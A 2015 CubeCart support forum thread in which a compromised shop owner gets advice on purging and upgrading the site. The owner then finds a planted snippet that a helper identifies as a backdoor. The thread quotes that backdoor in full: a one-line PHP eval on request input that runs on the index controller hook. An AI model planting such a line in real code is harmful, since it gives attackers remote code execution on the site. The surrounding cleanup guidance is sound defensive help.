QuotesUK Posted October 6, 2015 Share Posted October 6, 2015 I have a v5 installation that was compromised by the recent security flaw. I want to upgrade to v6 and be sure that the site is purged of any hidden files left by the hacker. Which approach would you recommend:1/ rollback to a safe backup, lose all new customer data, then upgrade2/ upgrade with compromised site, delete all cubecart files, then upload files from latest .zip installation packAm I right to assume that the method in (2) will work? Quote Link to comment Share on other sites More sharing options...
bsmither Posted October 6, 2015 Share Posted October 6, 2015 Save only images from /images/source/, save the /includes/global.inc.php, save only logos from /images/logos/, and if you have a custom skin, save that.In admin, Manage Hooks, Code Snippets tab, delete snippets you don't recognize.Then nuke the site.Upload the CC6 package. Copy back the globals.inc.php file. Copy back the images. Copy back your custom skin.Let CC6 UPGRADE the database. Quote Link to comment Share on other sites More sharing options...
QuotesUK Posted October 6, 2015 Author Share Posted October 6, 2015 Then nuke the site ... it's the only way to be sureYour instructions were excellentAfter upgrading I changed the database password on the server, and in the globals.inc.php file. I also changed all the admin passwords. I made a small tweak to the logo skin allocation settings. The payment/shipping options weren't carried over but installing new plugins was straightforward.As always, hugely grateful for your support. Quote Link to comment Share on other sites More sharing options...
QuotesUK Posted November 7, 2015 Author Share Posted November 7, 2015 Unfortunately, the site was hacked again by the same people.It appears there was something still lurking in either the database or the skin files.Is there any way to export product listings data, for example to XML, so that I can do a completely fresh install. Quote Link to comment Share on other sites More sharing options...
bsmither Posted November 7, 2015 Share Posted November 7, 2015 Are you running CC607 or better? Did you delete any Code snippets you did not recognize?If there is something in the database, and you want to backup some or all of that database, then you won't know if that something also got into the backup. Quote Link to comment Share on other sites More sharing options...
QuotesUK Posted November 7, 2015 Author Share Posted November 7, 2015 Yes. When I purged the old site (v5.2.9) I upgraded all the way to v6.0.8.There weren’t any hooks or code snippets to remove - just the one snippet that I left in called snippetABCd1 ... <?php eval($_REQUEST["ABCd1"]);?> which I see across all my Cubecart installs except the ABCd1 bit changes from site to site. I assume this snippet is common to everyone? Quote Link to comment Share on other sites More sharing options...
bsmither Posted November 7, 2015 Share Posted November 7, 2015 No. That is the snippet that is allowing backdoor access. The eval(...) is the key thing to look for.Delete it.Then, to make sure, use phpMyAdmin to look at the database table CubeCart_code_snippet to make sure it is completely empty.Then, look at CubeCart_hooks and verify that, if you have no plugins installed, there are no hooks registered here. Then look in the folder /includes/extra/ and delete all files that begin with snippet_. Quote Link to comment Share on other sites More sharing options...
QuotesUK Posted November 7, 2015 Author Share Posted November 7, 2015 Oh No! I have to kick myself for that oneIt says the trigger is "controller.index" Quote Link to comment Share on other sites More sharing options...
bsmither Posted November 7, 2015 Share Posted November 7, 2015 That trigger gets called 99% of the time, and early in the CubeCart wake-up sequence. Quote Link to comment Share on other sites More sharing options...
QuotesUK Posted November 7, 2015 Author Share Posted November 7, 2015 Fortunately I did a backup after completing my purge/upgrade, so I have something decent to fall back onto.After completing the rollback I will delete the snippet, switch to a new skin and dispose of the old, and then carry out a visual review of what is stored in the database.Thank you bsmither Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.